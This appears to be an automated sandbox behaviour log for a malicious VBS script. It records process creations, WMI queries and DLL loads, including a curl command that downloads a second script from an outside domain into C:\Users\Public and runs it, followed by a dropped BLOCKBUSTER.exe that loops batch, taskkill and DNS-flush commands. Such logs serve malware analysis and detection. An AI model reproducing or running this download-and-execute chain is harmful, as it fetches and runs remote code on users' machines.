Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\_672365339188b\BLOCKBUSTER.exe "C:\_672365339188b\BLOCKBUSTER.exe"
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\PING.EXE	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\_672365339188b\BLOCKBUSTER.exe "C:\_672365339188b\BLOCKBUSTER.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
